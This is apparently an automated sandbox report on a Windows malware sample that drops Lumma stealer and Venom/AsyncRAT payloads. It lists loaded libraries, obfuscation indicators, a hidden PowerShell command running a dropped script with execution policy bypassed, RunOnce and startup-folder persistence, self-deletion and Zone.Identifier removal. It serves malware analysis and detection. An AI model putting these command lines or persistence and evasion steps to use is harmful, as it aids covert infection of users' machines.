Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\2D42.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Xml.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: rust_dave_sideload.pdb source: vm.exe, 00000013.00000002.4123601062.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, lm.exe, 00000014.00000002.3069655853.000000006C888000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000001A.00000002.3227475624.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, g2m.dll0.14.dr
Source: Binary string: System.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: Binary string: BitLockerToGo.pdb source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb) source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Configuration.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.pdbMZ@ source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: Binary string: BitLockerToGo.pdbGCTL source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdbl source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER250C.tmp.dmp.29.dr
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000013.00000000.2626820511.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000013.00000002.4106639355.0000000000402000.00000002.00000001.01000000.00000013.sdmp, lm.exe, 00000014.00000002.3064617756.0000000000402000.00000002.00000001.01000000.00000014.sdmp, lm.exe, 00000014.00000000.2627426001.0000000000402000.00000002.00000001.01000000.00000014.sdmp, vm.exe, 0000001A.00000000.2764355472.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 0000001A.00000002.3104887965.0000000000402000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: System.Core.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Windows.Forms.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Core.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 19.2.vm.exe.4e40000.1.raw.unpack, ClientSocket.cs .Net Code: Invoke System.AppDomain.Load(byte[])
Source: 26.2.vm.exe.4e30000.1.raw.unpack, ClientSocket.cs .Net Code: Invoke System.AppDomain.Load(byte[])
Suspicious powershell command line found
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D64F0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess, 19_2_6C8D64F0
PE file contains an invalid checksum
Source: 8EC7.exe.1.dr Static PE information: real checksum: 0x0 should be: 0xf4e19
Source: g2m.dll.14.dr Static PE information: real checksum: 0x0 should be: 0x6caf9
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: real checksum: 0xfa47 should be: 0xafb3
Source: g2m.dll0.14.dr Static PE information: real checksum: 0x0 should be: 0x6caf9
Source: adjijwj.1.dr Static PE information: real checksum: 0xfa47 should be: 0xafb3
PE file contains sections with non-standard names
Source: EF14.exe.1.dr Static PE information: section name: .xdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00403230 push eax; ret 0_2_00403302
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004026FF push ecx; ret 0_2_0040270B
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC51C8 push ds; iretd 10_2_00007FFD9BAC5BDF
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC00BD pushad ; iretd 10_2_00007FFD9BAC00C1
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC0DFE push eax; retf 10_2_00007FFD9BAC0E1D
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC0DD5 push eax; ret 10_2_00007FFD9BAC0DFD
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC0DC0 push eax; ret 10_2_00007FFD9BAC0DFD
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC0D55 push eax; ret 10_2_00007FFD9BAC0DFD
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BBB23E1 push 8B485F90h; iretd 10_2_00007FFD9BBB23E6
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BBB238C push 8B485F90h; iretd 10_2_00007FFD9BBB2391
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB0DFE push eax; retf 12_2_00007FFD9BAB0E1D
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB0DD5 push eax; ret 12_2_00007FFD9BAB0DFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BABF9AD pushad ; iretd 14_2_00007FFD9BABF9B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BABF948 push eax; ret 14_2_00007FFD9BABF951
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BABFFFE push esp; retf 14_2_00007FFD9BABFFFF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAC5038 push eax; iretd 14_2_00007FFD9BAC50F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB3F7C push eax; iretd 14_2_00007FFD9BAB3F9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAC3F1B push ecx; retf 5E39h 14_2_00007FFD9BAC3F5C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB3EF2 push ecx; iretd 14_2_00007FFD9BAB3FFA
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8F63E1 push ecx; ret 19_2_6C8F63F4
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF3D71 push ds; iretd 19_2_05FF3D7E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF1F93 push eax; iretd 19_2_05FF1FA2
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF1F88 push eax; iretd 19_2_05FF1F92
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF4EE1 push ebp; iretd 19_2_05FF4EEE
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF20FF push ebp; iretd 19_2_05FF210A
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF2089 push esp; iretd 19_2_05FF208A
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF6831 push 6A4405FEh; iretd 19_2_05FF6836
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF201C push ebx; iretd 19_2_05FF202A
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF3B04 push eax; iretd 19_2_05FF3B0E
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C8863E1 push ecx; ret 20_2_6C8863F4
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: section name: .text entropy: 7.062434505591146
Source: adjijwj.1.dr Static PE information: section name: .text entropy: 7.062434505591146
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EF14.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2D42.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\adjijwj Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8EC7.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\adjijwj Jump to dropped file

Boot Survival
barindex
Yara detected AsyncRAT
Source: Yara match File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Yara detected VenomRAT
Source: Yara match File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR
Creates autostart registry keys with suspicious names
Source: C:\Windows\explorer.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY Jump to behavior
Drops VBS files to the startup folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs
Stores files to the Windows start menu directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs
Source: C:\Windows\explorer.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY Jump to behavior
Source: C:\Windows\explorer.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY Jump to behavior
Source: C:\Windows\explorer.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY Jump to behavior
Source: C:\Windows\explorer.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\adjijwj:Zone.Identifier read attributes | delete Jump to behavior
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
